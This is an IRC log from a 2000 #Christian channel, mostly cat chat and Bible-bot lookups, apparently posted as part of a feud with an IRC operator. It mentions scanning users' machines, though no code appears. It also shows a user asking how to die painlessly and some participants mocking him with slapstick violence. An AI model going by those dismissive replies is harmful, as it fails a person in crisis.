underestimate the abiity of the press to quote things out of context. [01:48] silly kittys [01:48] <Eponine`> Which one is the cameo one Colin? [01:48] <Wildernes> who knows what he might have actually indended to say? [01:48] Eponine` the light ginger ones [01:48] Tes Turnip? [01:48] Ted Turnip [01:48] Does he know every Christian ever alive? [01:48] <Eponine`> I love orange ones:) [01:48] *** Philip15 ([email protected]) has joined #CHristian [01:49] aw now i wana go play wif my lil stair troll [01:49] but he'll beat me up :| [01:49] The only thing ignorant here is the standard at which ted judges losing

[01:49] no. So he shouldn't say "Christians are losers." Its his opinion too. Personally I think we are winners because through Christ we have been saved and will live eternally for ever with the Lord and Saviour. [01:49] <weird> turnips are a dun color [01:49] <weird> oops sorry:( [01:49] turnips are nice in soup [01:50] <Eponine`> I have 2 kittens in my room with me now, the two nice ones:) they are feeling the heat here in Rocky [01:50] shrug, bugs making a mess with his food bowl. [01:50] <weird> and roasted n the oven [01:50] *** Wildernes ([email protected]) Quit (Leaving) [01:50] *** ROCKIN4JC ([email protected]) has joined #CHristian [01:50] * konfused skips off to find her kitty kat [01:50] Hey ROCKIN4JC [01:50] He likes to get it out one piece at a time with his paw, and munch it out of his paw. [01:50] bond that's great you have a different opinion [01:50] <eagles`> lol [01:50] He always leaves big mess, where he drops some of it. [01:51] or starts munching it, and little fragments break off. [01:51] Hey Colin [01:51] <Eponine`> Dogs have owners, Cats have staff ~~anonomous [01:51] messy mesy kitty [01:51] *** Adelphos ([email protected]) has joined #CHristian [01:51] <^John^> Colin^ is it listed in the directory? [01:51] Cats Rule Dogs Drool [01:51] i found my stair troll :) [01:51] *** ROCKIN4JC ([email protected]) Quit (Leaving) [01:51] Colin^: heheh [01:51] <Eponine`> hehehe [01:51] konfused: lol ;p [01:51] ^John^ is what? [01:51] <^John^> Your web oage [01:51] <^John^> Page even [01:52] <Eponine`> I like pigs too (the guinnea kind) they are furry pigs [01:52] *** Adelphos ([email protected]) has left #CHristian [01:52] <weird> so are you guys seriously all christians? [01:52] <Eponine`> Colin, Tiger is soooo cute! it's a she isn't it? a tortoise shell? [01:52] <^John^> I am all a Christian [01:52] I am weird [01:52] err I am, weird [01:52] <Jewelz``> weird, not I :) [01:52] Eponine` yes, she squeeks like a mouse as well [01:53] Eponine`: I dunno about tiger, but I think the mrbig eyes one is a calico? [01:53] * weird is not convinced [01:53] weird: No, I'm not a christian. [01:53] weird not everyone in here is [01:53] <Eponine`> cute colin :))))))))) [01:53] <Eponine`> what is a calico, Raid? is that the colour? [01:53] * Raid cat is a purebread long redhaired persian [01:53] Raid Mr Jordan Big Eyes is the big cat with a coons tail, he is a Maine Coon [01:53] Eponine`: No, it's the bred. [01:54] weird: just like i don't have to believe an arguement to defend it [01:54] Colin^: HAHAHA, seriously? [01:54] he doesn't look like a coon from the pic. [01:54] no wait, I take that back. [01:54] he does. [01:54] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy majesty all the day long [01:54] *** Skippii ([email protected]) has joined #CHristian [01:54] *** TallCaMan ([email protected]) Quit (Leaving) [01:54] *** Skippii ([email protected]) has left #CHristian [01:54] Colin^: how did you get a maine kitty all the way where you are?

[01:55] Raid he will go for a walk around the block at night with me [01:55] <weird> calico cats are always female and called tortoiseshell sometimes cos of the colour mix .... this is not a dictionary definition [01:55] weird: No... [01:55] Raid, someone brought the bereed over here [01:55] weird: I had two male calico kitties. [01:55] <weird> no way! [01:55] weird: Yes dude. [01:55] *** Skypark ([email protected]) has joined #CHristian [01:55] <Skypark> hi all [01:55] <salutar> Let my mouth be filled with Thy praise, that I may hymn Thy glory and Thy majesty all the day long [01:55] <weird> always female [01:56] <eagles`> hey Skypark [01:56] weird: hrm.. Nope. Had two calicos, and I know for a fact they were male ;p [01:56] <eagles`> amen salutar [01:56] weird yes tortisshell are always female [01:56] <Skypark> hello big "" [01:56] standard calico [01:56] <Skypark> hello big "e" [01:56] <Skypark> :) [01:56] <weird> than you Colin [01:56] <weird> k [01:56] they don't have the as big white spot as colins. [01:56] <Eponine`> oooh calico and tortoishell are the same?? [01:56] Eponine`: No [01:56] <weird> yeah [01:56] They are kinda built like siamese [01:56] long... slender things [01:57] <weird> torti and callis are the same [01:57] <weird> mixed breeds but cute [01:57] dude, I swear... [01:57] they were pure calicos [01:57] we had two of them. [01:58] <weird> there is only only one pure calico...... [01:58] <Eponine`> all the tortis I know have attitudes :P [01:58] calicos are different, Sophoie, one of our kittens is Cameo [01:58] Eponine`: they meow alot too ;p [01:58] <Eponine`> yep sure do, really cute meows :) [01:58] and I mean alot. [01:58] yes yes [01:58] <Eponine`> they are demanding! [01:58] Oh indeed [01:58] <weird> calm down guys [01:58] if you don't pet them right away, they'll go out of there way to get in your way so you do hehe [01:58] <Eponine`> and they ignore you when they are tired too [01:59] <Eponine`> hehehehe yep! [01:59] and they dont purr much [01:59] well, they do sometimes, but they meow more [01:59] <Eponine`> one of mine, licks my fingers non stop [01:59] Bug on the other hand, he's a purrer [01:59] and a lap cat hehe [01:59] <Eponine`> hehehehe [01:59] <Eponine`> and a biter when she feels like it [01:59] *** Tomm ([email protected]) has joined #CHristian [01:59] hes a cuddly bugsy wugsy [01:59] *** Tomm ([email protected]) has left #CHristian [02:00] *** Twinsen ([email protected]) has left #CHristian [02:00] <Eponine`> aww :) [02:00] <Eponine`> have you got a picture? [02:00] Yep, but no scanner [02:00] heh

[02:00] Bright red and orange. [02:00] with the orange stripes hehe [02:00] and the huge paws. [02:00] <Eponine`> awww :) [02:00] <Eponine`> both my tortis were strays [02:00] *** Philip15 ([email protected]) Quit (Broken pipe) [02:00] and hes lazy as heck [02:00] <Eponine`> they are both dark with flecs of every colour :) [02:00] <weird> my neice sent me a picture of a big pussy i thought it might be a joke and it was [02:01] <weird> ie [02:01] I've seen him stretch out in the middle of the kitchen floor. hehe [02:01] <Eponine`> huge paws are so cute :) [02:01] <Eponine`> they look like little lion cubs :) [02:01] YES [02:01] he resembles a baby lion or tiger ;p [02:01] <Eponine`> hehe [02:01] <Eponine`> kittens rule:) [02:02] but because he has a smushed in face, I have to clean his nose and eyes for him. hehe [02:02] <Eponine`> awww [02:02] <Eponine`> my sootie the torti has a smushed face too [02:02] <Eponine`> i think she might be part persian [02:02] <Eponine`> her full name is Princess Sootie Lucky Buttons [02:03] *** triasha ([email protected]) has joined #CHristian [02:03] hehehe [02:03] <weird> recessive gene the torti thingie [02:03] mesay u there? [02:03] Have you guys seen those bald cats? [02:03] ? [02:04] Ugly looking things [02:04] <Eponine`> Sphinx? [02:04] those things look cool, lol [02:04] <weird> (am i living up to my name?) [02:04] <Eponine`> with huge ears and really bony [02:04] I have... on tv [02:04] * konfused attempts to be wierder than weird [02:04] *** ^John^ is now known as JohnBRB [02:04] Austin Powers has a bald cat [02:05] <weird> oh ok you have thi stage Konfused:) [02:05] those cats are supposed to be specially breaded [02:05] <Eponine`> did anyone seen Cats the musical??? [02:05] heh [02:05] <Eponine`> I had front row, it was sooo cool [02:05] * konfused be's weirder than weird [02:05] <Eponine`> I got to touch the kittens :) [02:05] *** thumps ([email protected]) has joined #CHristian [02:05] there, how was that? :) [02:05] *** WingNut ([email protected]) has joined #CHristian [02:05] Hey thumps [02:05] ... [02:05] Hi ya WingNut [02:05] grrrrrreetings [02:05] heya Colin [02:05] <Eponine`> and one of them took an audience member's coat and did little marching girl (marching kitten, you know what i mean) it was soo cool [02:05] ... [02:05] wing [02:05] <WingNut> Heya, thumps! [02:05] <WingNut> Hey Colin^!!!! :o) [02:06] * weird sees everybody luvs Colin [02:06] *** ramdac ([email protected]) Quit [02:06] * weird included

[02:06] <weird> so kewl :) [02:06] Some people say cats are stupid because you can't train them. This isn't true. it's not that you can't train them, it's easier for them to train you. ;p [02:06] <Eponine`> Colin always meows at me :)))) [02:07] my cat plays fetch [02:07] <Eponine`> hahahaha raid, so true! [02:07] <Eponine`> konfused, really"?????? [02:07] Eponine` have doene for 4 years or more [02:07] yup, much better than my dog too [02:07] <Eponine`> yeppers:) [02:07] <Eponine`> with a toy or what? [02:07] <WingNut> Raid: I once heard someone make the observation: Humans train dogs, cats train humans, nobody trains cats. So who is smarter? [02:07] *** sunshineM ([email protected]) has joined #CHristian [02:07] WingNut: LOL [02:07] yup :) this little stuffed monkey... [02:08] <weird> ferrets [02:08] <eagles`> interesting rofl [02:08] <WingNut> Hey, sunshineM. [02:08] *** sunshineM ([email protected]) Quit (Read error to sunshineM: EOF from client) [02:08] <weird> oh and pigs and horses might get a mention [02:08] <Eponine`> cool, confused :) [02:08] <Eponine`> LOL wingnut [02:08] does logos have a topical concordance? [02:08] <Eponine`> knofused, i mean [02:08] <Eponine`> oops [02:08] <Eponine`> konfused :) [02:08] heh [02:08] * eagles` is off to do stuff offline... wish I could remember why I cam on line and hour and a half ago, though [02:09] danimal he will do simple searches [02:09] <weird> bye eagles:) [02:09] Bye eagles [02:09] <eagles`> ooroo [02:09] <Eponine`> byee eagles :) [02:09] <Eponine`> ooroo [02:09] bye eagle [02:09] s [02:09] <weird> tut such self control:) [02:10] <weird> i have none [02:10] * Eponine` either [02:10] Eponine`: My cat seems to know when I'm not feeling well too. [02:10] he'll come over and sit by me, and purr me a little tune.. sometimes even kneed me. [02:10] <eagles`> !skjv apostle [02:10] Seek Reply: Matthew 10:2, Mark 6:30, Acts 1:2, Acts 1:25, Acts 1:26, Romans 1:1, Romans 1:5, Acts 2:37, Luke 6:13, Acts 2:42, 1 Corinthians 1:1, Acts 2:43, 2 Corinthians 1:1, Galatians 1:1, Ephesians 1:1, Galatians 1:17, Galatians 1:19, Colossians 1:1, Galatians 2:8, 2 Timothy 1:1 ... [02:10] mmmeeeeeeeeesssssssaaaaaaaaayyyyyyyy txt nman dyan [02:11] <eagles`> wonder if.... [02:11] Raid my cat does that if I am in bed with a BAD migraine, he will come and cuddle up for hours [02:11] <eagles`> !skjv acts apostle [02:11] when I have the flu it sucks, cause I have to make him get away from me, so I dont get him sick. hehe [02:11] Seek Reply: [02:11] <eagles`> no you can't use a modifier [02:11] <weird> dogs lickings are healthy [02:12] <Eponine`> Wow Raid mine does too :) [02:12] <Eponine`> when i broke up with a BF and was upset, my cat (the nasty one who was nice back then) wouldnt leave me alone hehehe

[02:12] <Eponine`> cats just seem to know, eh? [02:12] yep [02:12] colin do you believe that telepathy exitst? [02:12] <Eponine`> i love when they kneed [02:12] bug seemed to know I was talking about him, cause he's perched himself on my lap now. [02:12] <Eponine`> its so cute [02:13] he ordered me to move my legs so he could sit comfortably. (he has a good sense of how far into my skin he can put his claws.. hehe) [02:13] <eagles`> sounds like the siamese I used to have [02:13] danimal I used to do it [02:13] *** Maverick ([email protected]) Quit (Ping timeout for Maverick[203-79-65-231.tnt8.paradise.net.nz]) [02:14] I consider him to be more then a pet to me. heh [02:14] So yes I do believe you can talk through it [02:14] <Eponine`> hehehehe [02:14] hes like.. my best friend. [02:14] <weird> big brother training of chaquita is kinda flawed [02:14] always there when I need someone to talk too. [02:14] Auras? [02:14] <Eponine`> mine are my children :) [02:14] talk through what? [02:14] <Eponine`> Furby is sitting on my computer desk now and purring [02:14] <weird> BUT [02:14] <Eponine`> can hardly move my mouse hehehe [02:14] oh :) [02:14] <weird> very loving [02:14] hahahahaha [02:14] * Colin^ has to go, Abbigail has made me two big hamburgers(my favourates) [02:14] <Eponine`> yikes he's nearly falling off the desk but he's still asleep and purring [02:15] *** eagles` ([email protected]) Quit (Pipe broken, plumber sent for, priority low) [02:15] Eponine`: lol [02:15] take care all [02:15] <Eponine`> awww byeeee Collies take care [02:15] bye Colin^!!!!!!!!! [02:15] <Skypark> heheheheh [02:15] <weird> bye Col:) [02:15] mews Eponine` [02:15] <Eponine`> mews :) [02:15] Bye Bond-007, take care [02:15] <Skypark> na na na na na [02:15] Bye weird, nice to meet you [02:15] Eponine`: If I don't pet bug when he arrives in my lap, He'll climb on top of the keyboard and sit on it until I acknowledge him. [02:15] * Eponine` 's Furby is the clumsiest cat ever :) [02:15] <weird> u 2 [02:15] <Eponine`> LOL Raid, does he try to type??? [02:16] * konfused takes the batteries out of eponine's cat [02:16] Nope. he just knows my attentions on the computer, and he remedies the problem hehe [02:16] *** jamie^16 ([email protected]) Quit (Why do people cry when they hear the word goodbye!!!!) [02:16] <Eponine`> lol konfused! [02:16] *** Colin^ ([email protected]) Quit (And the Band played on................and on................and on..................and on..........................) [02:16] *** Disconnected [02:16] * Raid is away since 02:16:45 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved. [02:16] *** Attempting to rejoin... #CHristian Cannot send to channel * Timer 100 halted

* Timer 101 halted [02:16] * Raid has returned ( Auto-Away: Not here ) - on 02:16:48 @ 09/09/2000 - Away 0 minutes. [02:16] *** Rejoined channel #christian [02:16] *** Topic is 'Encourage each other daily. (Hebrews 3:13)' [02:16] *** Set by Beukeboom on Fri Sep 08 03:42:57 [02:16] -logos3- http://www.forchrist.net - channel website, for rules and other info. [02:16] <Eponine`> aww [02:16] <Eponine`> wb :) [02:17] <Eponine`> Raid, sounds like he's got you wrapped around his little paw :) [02:17] lol [02:17] yep. [02:17] grrrrrr [02:17] stupid internet! [02:17] Why must you disconnect her! [02:18] I was talking to her asking her what time she wanted to be picked up and she got disconnected [02:18] <Eponine`> aww poor Bond [02:19] That makes me so mad [02:19] Its 11:19PM so too late to call [02:19] <Eponine`> will she come back? [02:19] i hope [02:19] *** jamie^16 ([email protected]) has joined #CHristian [02:19] Im gonna goto sleep soon so I can wake up early so I can call her and get directions to her house etc [02:20] *** KJV1611 ([email protected]) has joined #CHristian [02:20] *** ZoOrOpA ([email protected]) has joined #CHristian [02:20] *** AceRadio ([email protected]) has joined #CHristian [02:21] well its been almost 5 minutes [02:21] *** logos3 sets mode: +o ZoOrOpA [02:21] i dont think she is coming back [02:21] *** ZoOrOpA sets mode: -o ZoOrOpA [02:21] *** Disconnected [02:21] * Raid is away since 02:21:32 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved. [02:21] *** Attempting to rejoin... #CHristian Cannot send to channel [02:21] *** Rejoined channel #christian [02:21] *** Topic is 'Encourage each other daily. (Hebrews 3:13)' [02:21] *** Set by Beukeboom on Fri Sep 08 03:42:57 [02:21] -logos3- http://www.forchrist.net - channel website, for rules and other info. [02:21] hi ZoOrOpA [02:21] <weird> i luv these nicks [02:21] wb raid [02:21] hi [02:21] <Eponine`> wb Raid [02:22] *** Luther ([email protected]) has joined #CHristian [02:22] Welcome to #Christian, luther [02:23] has thatcher been on lately? [02:24] yesterday [02:24] hmmm [02:24] *** weird ([email protected]) Quit (Leaving) [02:24] niv rev 2:3 [02:25] guess the bots are down right now [02:25] !niv rev 2:3 [02:25] danimal: Rev 2:3 "3 You have persevered and have endured hardships for my name, and have not grown weary." (NIV) [02:25] gotta use the '!"? [02:25] yup [02:25] !niv rev 2:5 [02:25] AceRadio: Rev 2:5 "5 Remember the height from which you have fallen! Repent and do the things you did at first. If you do not repent, I will come to you and remove your lampstand from its place." (NIV)

[02:25] ah, ok [02:26] !niv jeremiah 3:8 [02:26] *** TopTed ([email protected]) has joined #CHristian [02:26] AceRadio: Jeremiah 3:8 "8 I gave faithless Israel her certificate of divorce and sent her away because of all her adulteries. Yet I saw that her unfaithful sister Judah had no {fear;} she also went out and committed adultery." (NIV) [02:26] Welcome to #Christian, topted [02:26] hi AceRadio [02:26] *** ZoOrOpA ([email protected]) Quit (The Moon is up..and over One Tree Hill.....we see the sun go down in your eyes.....) [02:26] *** Shaina` ([email protected]) has joined #CHristian [02:26] Welcome to #Christian, shaina` [02:27] *** CodePoet ([email protected]) Quit (The quest for faith is a lunar endevour, not warmer and brighter, but darker and wetter.) [02:27] !niv jeremiah 4:2 [02:27] AceRadio: Jeremiah 4:2 "2 and if in a truthful, just and righteous way you swear, 'As surely as the LORD lives,' then the nations will be blessed by him and in him they will glory.'" (NIV) [02:27] <Shaina`> thanks for welcome me AceRadio [02:27] yw [02:28] <Shaina`> :) [02:28] !niv luke 4:9 [02:28] AceRadio: Luke 4:9 "9 The devil led him to Jerusalem and had him stand on the highest point of the temple. 'If you are the Son of God,' he said, 'throw yourself down from here." (NIV) [02:28] anyone want to see a funny log message me [02:28] !kjv proverbs 30:4 [02:28] TopTed: Proverbs 30:4 "4 Who hath ascended up into heaven, or descended? who hath gathered the wind in his fists? who hath bound the waters in a garment? who hath established all the ends of the earth? what is his name, and what is his son's name, if thou canst tell?" (KJV) [02:29] *** Bond-007 ([email protected]) Quit (Ping timeout for Bond-007[17-133.nctimes.net]) [02:29] !niv psalm 1:45 [02:29] AceRadio: Psalm 1:45 "" (NIV) [02:29] !niv psalm 14:5 [02:29] AceRadio: Psalm 14:5 "5 There they are, overwhelmed with dread, for God is present in the company of the righteous." (NIV) [02:30] !kjv luke 4:20-21 [02:30] TopTed: Luke 4:20-21 "20 And he closed the book, and he gave it again to the minister, and sat down. And the eyes of all them that were in the synagogue were fastened on him. 21 And he began to say unto them, This day is this [02:30] scripture fulfilled in your ears." (KJV) [02:30] *** Luther ([email protected]) has left #CHristian [02:31] *** TacoMan ([email protected]) Quit (Excess Flood) [02:32] *** charisma ([email protected]) has joined #CHristian [02:32] Welcome to #Christian, charisma [02:33] <Shaina`> how are you AceRadio? [02:33] *** Helt ([email protected]) has joined #CHristian [02:33] Welcome to #Christian, helt [02:33] shaina- i'm good [02:33] *** Helt ([email protected]) has left #CHristian [02:33] shaina- u? [02:33] *** bu2zard ([email protected]) has joined #CHristian [02:33] Welcome to #Christian bu2zard [02:33] <Shaina`> AceRadio: i'm great thanks :) [02:34] hi [02:34] *** jamie^16 ([email protected]) has left #CHristian [02:34] *** bu2zard ([email protected]) has left #CHristian [02:34] *** LARING ([email protected]) has joined #CHristian [02:34] Welcome to #Christian, laring [02:35] *** LARING ([email protected]) has left #CHristian [02:35] *** space[AW] ([email protected]) has joined #CHristian

[02:35] *** jamie^16 ([email protected]) has joined #CHristian [02:35] Welcome to #Christian, space[aw] [02:35] wb jamie [02:36] <space[AW]> AceRadio hi.. thanx [02:36] *** space[AW] is now known as spaceJAM [02:37] *** aLiCh|gRL ([email protected]) has joined #CHristian [02:37] oh hum... [02:37] Welcome to #Christian, alichigrl [02:37] 1:39 am cdt [02:38] *** AgnusDei ([email protected]) has joined #CHristian [02:38] *** aLiCh|gRL ([email protected]) Quit (Ping timeout for aLiCh|gRL[210.23.210.216]) [02:38] <Shaina`> it's 2:38am here [02:38] Welcome to #Christian, agnusdei [02:39] good evening ace [02:39] !kjv 1john 2:15 [02:39] TopTed: 1John 2:15 "15 Love not the world, neither the things that are in the world. If any man love the world, the love of the Father is not in him." (KJV) * Timer 100 halted * Timer 101 halted [02:39] * Raid has returned ( Auto-Away: Not here ) - on 02:39:14 @ 09/09/2000 - Away 17 minutes. [02:39] wb raid [02:39] crud [02:39] I will sleep soon. [02:39] but first, must smoke this cig. [02:40] brr tis cold here [02:41] konfused- grab a blanket [02:41] i have one :o [02:41] *** sunshineM ([email protected]) has joined #CHristian [02:41] Welcome to #Christian, sunshinem [02:42] *** WingNut ([email protected]) Quit (Ping timeout for WingNut[A020-0450.TULS.splitrock.net]) [02:42] *** Disconnected Session Close: Sat Sep 09 02:42:36 2000

Session Start: Sat Sep 09 12:25:22 2000 [12:25] *** Now talking in #CHristian [12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info. [12:25] mornin [12:26] *** LC ([email protected]) has joined #CHristian [12:26] *** Txico ([email protected]) Quit (Ping timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za]) [12:26] ok everyone, when Raid's in the channel, all your machines are going to be scanned so be prepared [12:27] * CiCi waits for Raid to meet her router that doesn't appreciate script kiddie probes [12:27] CiCi: Actually, I've turned the script off. [12:28] CiCi: I didn't want to risk having to explain what netbios open shares are again. ;p [12:28] *** hunnynut ([email protected]) Quit [12:29] *** prophecy_ ([email protected]) Quit (Leaving) [12:29] anyone else under 15 on this channel? [12:29] *** Dmel ([email protected]) Quit (Leaving) [12:33] *** SixSteps ([email protected]) has joined #CHristian [12:33] *** SixSteps ([email protected]) has left #CHristian [12:33] * patience_ will bbl [12:34] any girls wanna chat to Jasmine? [12:37] is this a flirt channel [12:37] lol [12:37] Jasmine is 9 and she's a girl wanting to chat to another girl her own age [12:38] do you call that flirting? [12:38] :) [12:38] *** Philip15 ([email protected]) has joined #CHristian

[12:38] I"m not her age, but I'll chat with her if she wants [12:39] If jasmine wants to talk to a Baptist preacher...old enough to be her dad...or grand dad...I will be glad to as well [12:40] lol [12:40] :) [12:41] Thanks for the offer [12:42] /msg LC I thought I'd help you out. Heres my number so your lawyer can contact me. (310) 883-2304 Ext 620 [12:42] doh [12:42] stupid paster [12:43] if im not there, leave a msg with a number; I'll call you back on my dime. [12:44] * Raid is away since 12:44:05 - 09/09/2000 ( Must find food... Wheres that burger king? ) - Msgs will be saved. [12:44] *** patience_ is now known as pataway [12:44] *** ontario_2 ([email protected]) has joined #CHristian [12:45] *** ontario_2 ([email protected]) has left #CHristian [12:45] *** Adar_Caan ([email protected]) has joined #CHristian [12:45] *** Philip15 ([email protected]) Quit (Ping timeout for Philip15) [12:48] *** Nell` ([email protected]) has joined #CHristian [12:48] *** Nell` ([email protected]) Quit (Wishing you peace, love and Souuuuuuuulll train! - Don Cornelius) [12:48] *** kosmos ([email protected]) has joined #CHristian [12:49] *** ecomaster ([email protected]) has joined #CHristian [12:49] *** LC ([email protected]) has left #CHristian (Peace & Protection 4.00 FINAL BETA) [12:49] *** ecomaster is now known as eminemx [12:49] <eminemx> hello [12:49] <eminemx> I need help [12:49] with what? [12:49] <eminemx> I feel awful [12:50] <eminemx> I just found out my girlfriend has been cheating on me...I need some direction [12:50] <Elijah_> ouch...i'm sorry. :( [12:50] oh dear [12:50] I'm very sorry for you [12:51] <eminemx> I feel like dying [12:51] That is tough [12:51] <eminemx> I know she is confused [12:51] <Elijah_> been there, done that. :( [12:51] are you a christian and is your g/f? [12:51] <eminemx> I am ...she is not =( [12:52] * kosmos -------(o<----(o<----(o<[12:52] *** aphrael ([email protected]) Quit (Leaving) [12:54] <eminemx> I want to die! [12:54] <eminemx> but I dont know how [12:54] <eminemx> painless [12:54] <eminemx> fast [12:54] * kosmos slaps eminemx around a bit with a Pirahna [12:54] dying is easy ... living is hard [12:55] <pataway> (((((((((( eminemx )))))))))) [12:55] i want to live [12:55] easy is no goot [12:55] hey, there's tons of things I could tell you right now, but I don't think they're things you want to hear just now [12:55] <eminemx> what [12:55] <eminemx> please say something [12:55] well [12:55] <eminemx> I am crying like a d*** baby! [12:55] <pataway> dying wont solve anything [12:55] * kosmos picks up the nearest cement mixer and slams it on eminemx's head. [12:55] crying is goot [12:55] <pataway> kosmos you7re not helpin [12:55] *** Disconnected

Session Close: Sat Sep 09 13:13:06 2000

These text files comprise the war with Undernet IRCop CiCi so far. As you can see by reading the files yourself, She isn't qualified for her position. She be way too dumb.

Related Documents

Ezine - Coderz #1
May 2020 6
Ezine - 29a-1
May 2020 22
Silat Melayu Ezine 1
June 2020 10
Ezine 3
December 2019 31
April05 Ezine
November 2019 27
Mini Ezine Mac 2009
December 2019 40